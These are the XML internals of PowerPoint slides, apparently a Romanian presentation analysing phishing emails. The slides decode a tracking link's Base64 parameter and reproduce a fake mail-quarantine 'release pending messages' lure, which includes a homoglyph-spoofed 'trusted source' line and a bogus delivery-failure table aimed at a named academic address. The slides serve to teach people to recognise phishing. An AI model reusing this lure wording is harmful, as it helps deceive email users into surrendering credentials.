              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://mail1.sci-researchoarestext.info/mautic/r/3ea070d050e059ea1886d9da3?ct=YTo1OntzOjY6InNvdXJjZSI7YToyOntpOjA7czoxNDoiY2FtcGFpZ24uZXZlbnQiO2k6MTtpOjEyO31zOjU6ImVtYWlsIjtpOjIyO3M6NDoic3RhdCI7czoyMjoiNjVkYzNlMmRiODc4YzU2MzEwNDEwOCI7czo0OiJsZWFkIjtzOjY6IjExMzcxMiI7czo3OiJjaGFubmVsIjthOjE6e3M6NToiZW1haWwiO2k6MjI7fX0%3D&amp;utm_source=JOO&amp;utm_medium=JOO&amp;utm_campaign=JOO&amp;utm_content=JOO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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821501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sz="1400"/>
              <a:t>decodarea link-ului</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627888" y="2239971"/>
            <a:ext cx="7918704" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://mail1.sci-researchoarestext.info/mautic/r/3ea070d050e059ea1886d9da3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ct=YTo1OntzOjY6InNvdXJjZSI7YToyOntpOjA7czoxNDoiY2FtcGFpZ24uZXZlbnQiO2k6MTtpOjEyO31zOjU6ImVtYWlsIjtpOjIyO3M6NDoic3RhdCI7czoyMjoiNjVkYzNlMmRiODc4YzU2MzEwNDEwOCI7czo0OiJsZWFkIjtzOjY6IjExMzcxMiI7czo3OiJjaGFubmVsIjthOjE6e3M6NToiZW1haWwiO2k6MjI7fX0%3D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>utm_source=JOO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>utm_medium=JOO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>utm_campaign=JOO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>utm_content=JOO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078224" y="727038"/>
            <a:ext cx="7449312" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://mail1.sci-researchoarestext.info/mautic/r/3ea070d050e059ea1886d9da3?ct=YTo1OntzOjY6InNvdXJjZSI7YToyOntpOjA7czoxNDoiY2FtcGFpZ24uZXZlbnQiO2k6MTtpOjEyO31zOjU6ImVtYWlsIjtpOjIyO3M6NDoic3RhdCI7czoyMjoiNjVkYzNlMmRiODc4YzU2MzEwNDEwOCI7czo0OiJsZWFkIjtzOjY6IjExMzcxMiI7czo3OiJjaGFubmVsIjthOjE6e3M6NToiZW1haWwiO2k6MjI7fX0%3D&amp;utm_source=JOO&amp;utm_medium=JOO&amp;utm_campaign=JOO&amp;utm_content=JOO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5409989" y="4152638"/>
            <a:ext cx="5453083" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decode from Base64 format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a:5:{s:6:"source";a:2:{i:0;s:14:"campaign.event";i:1;i:12;}s:5:"email";i:22;s:4:"stat";s:22:"65dc3e2db878c563104108";s:4:"lead";s:6:"113712";s:7:"channel";a:1:{s:5:"email";i:22;}}7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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57676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sz="1800"/>
              <a:t>Decodare Base64 online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259440" y="2201502"/>
            <a:ext cx="4234647" cy="1270906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Obținerea informațiilor se poate face prin intermediul aplicațiilor online de decodare Base64.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2080069"/>
            <a:ext cx="6340726" cy="44670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696" y="3852196"/>
            <a:ext cx="2487652" cy="2487652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48589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581192" y="2662428"/>
            <a:ext cx="4552099" cy="353943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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="175EE8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blocked incoming messages for paul_gagniuc@acad.ro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You have 10 pending messages for delivery to your mail box.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Authorize Delivery for pending mails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="F70840"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Click here to release these messages to your inbox folder</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Due to registry restrictions, domain privacy is unavailable for a handful of TLDs. Check the Domain Privacy page to see the full list of affected domains.    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" i="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000" i="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit the Whois privacy service agreement page for further details.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" i="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000" i="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(c) Poweredby: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="F97C00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> IT acad.ro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Flowchart: Process 10"/>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Atac in trepte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3699421357"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="581192" y="2177001"/>
          <a:ext cx="3442007" cy="371856"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="76902">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3365105">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="371856">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25751" marR="25751" marT="25751" marB="2575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29740"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600">
                          <a:effectLst/>
                          <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This email ιs from a trusted sοurce.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25751" marR="25751" marT="25751" marB="2575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FF8"/>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80528306"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5377496" y="2123123"/>
          <a:ext cx="6124407" cy="3878764"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1372373">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2068617">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2044462">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="638955">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>failure delivery messages</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6006" marR="6006" marT="6006" marB="6006" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="455A73"/>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844">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9009" marR="9009" marT="6006" marB="6006" anchor="b">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BFBFB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Recipient:</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9009" marR="9009" marT="6006" marB="6006" anchor="b">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BFBFB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Subject:</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9009" marR="9009" marT="6006" marB="6006" anchor="b">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a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FBFBFB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Date:</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9009" marR="9009" marT="6006" marB="6006" anchor="b">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a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FBFBFB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>⛔ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="0066CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>Release</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4504" marR="4504" marT="4504" marB="4504" anchor="ctr">
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>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14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207">
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="257804">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>paul_gagniuc@acad.ro</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u="sng">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>RE: RE: KI/PO/09-23/319 AUMA---RFQ Electric Actuator / Motorized Valve---KI/SO/2023/632 (PROJECT)---AUMA ack. AJB230694-SGP23508**AJB230694** **payment slip**</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a:effectLst/>
                        </a:rPr>
                        <a:t>2/27/2024 1:05:05 a.m.</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endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>⛔ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="0066CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>Release</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4504" marR="4504" marT="4504" marB="4504" anchor="ctr">
